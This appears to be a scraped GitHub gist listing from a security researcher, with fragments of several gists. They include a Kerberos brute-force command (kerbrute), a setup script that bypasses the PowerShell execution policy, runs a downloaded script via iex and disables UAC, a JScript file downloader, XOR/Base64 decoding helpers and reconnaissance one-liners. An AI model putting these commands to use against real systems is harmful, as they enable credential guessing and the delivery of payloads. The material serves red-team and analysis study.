With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wmic useraccount where name='test_user' get sid | |
| wmic useraccount where (name='test_user' and domain=′corp.com′) get sid | |
| wmic useraccount where sid='S-1-3-12-12451234567-1234567890-1234567-1434' get name |
macostag
/ kerberos_attacks_cheatsheet.md
Created
April 5, 2021 00:11
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Bypass Execution Policy | |
| Set-ExecutionPolicy Bypass -Scope CurrentUser -Force | |
| #Install boxstarter | |
| [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://boxstarter.org/bootstrapper.ps1')); Get-Boxstarter -Force | |
| #Disable UAC | |
| Disable-UAC | |
| #Disanle Micrsoft Update |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MITRE ATT&CK | |
| ------------ | |
| MITRE ATT&CK® : | |
| https://attack.mitre.org | |
| Getting Started with ATT&CK: Detection and Analytics : | |
| https://medium.com/mitre-attack/getting-started-with-attack-detection-a8e49e4960d0 | |
| Getting Started with ATT&CK: Adversary Emulation and Red Teaming : | |
| https://medium.com/mitre-attack/getting-started-with-attack-red-29f074ccf7e3 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import struct | |
| import sys | |
| #Single Byte XOR | |
| def xor(data,key): | |
| translated = ""; | |
| for ch in data: | |
| translated += chr(ord(ch) ^ key) | |
| return translated |
macostag
/ testb64Non.py
Last active
April 12, 2020 23:57
Encoding and decoding Base64 (Nonstandard Bas64 character set)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| chr_set = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" | |
| non_chr_set = "0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz=" | |
| encoded = "G6JgP6w=" | |
| re_encoded = "" | |
| for en_chr in encoded: | |
| re_encoded += en_chr.replace(en_chr,chr_set[non_chr_set.find(en_chr)]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64 | |
| plain_text = "One" | |
| encoded = base64.b64encode(plain_text) | |
| print encoded | |
| decoded = base64.b64decode(encoded) | |
| print decoded |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| certstream | grep -E "\.org\.com$" | |
| curl -s https://certspotter.com/api/v0/certs?domain=org.com | jq |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from shodan import Shodan | |
| import ipaddress | |
| import pprint | |
| import json | |
| pp = pprint.PrettyPrinter(indent=2) | |
| api = Shodan('') | |
| net = ipaddress.ip_network('') | |
| for xIp in net.hosts(): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
| WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); | |
| WinHttpReq.Send(); | |
| BinStream = new ActiveXObject("ADODB.Stream"); | |
| BinStream.Type = 1; | |
| BinStream.Open(); | |
| BinStream.Write(WinHttpReq.ResponseBody); | |
| BinStream.SaveToFile("c:\\Windows\\Temp\\file.txt"); |
NewerOlder